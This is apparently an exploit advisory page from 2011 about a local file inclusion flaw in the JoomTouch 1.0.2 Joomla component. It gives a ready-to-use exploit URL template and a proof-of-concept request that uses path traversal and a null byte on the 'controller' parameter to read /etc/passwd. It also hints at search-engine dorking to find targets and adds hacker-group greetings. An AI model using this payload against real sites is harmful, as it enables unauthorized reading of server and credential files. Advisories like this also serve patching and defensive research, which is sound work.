Joomla JoomTouch 1.0.2 Local File Inclusion

2011-08-17 / 2011-08-18

Credit: NoGe

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

================================================================================
[o] JoomTouch Joomla Component <= Local File Inclusion Vulnerability
Software : com_joomtouch ver 1.0.2
Vendor : http://www.joomtouch.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Home : http://evilc0de.blogspot.com/
================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_joomtouch&controller=[LFI]
[o] PoC
http://localhost/[path]/index.php?option=com_joomtouch&controller=../../../../../../../../../../../../../../../../../../../etc/passwd%00
[o] Dork
be creative.. :))
================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe matthews wishnusakti kaka11 inc0mp13te martfella
pizzyroot Genex H312Y }^-^{ noname tukulesto
================================================================================
[o] August 17 2011 - Papua, Indonesia
[o] Hiduplah Indonesia Raya.. MERDEKA!! ^_____^

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla JoomTouch 1.0.2 Local File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.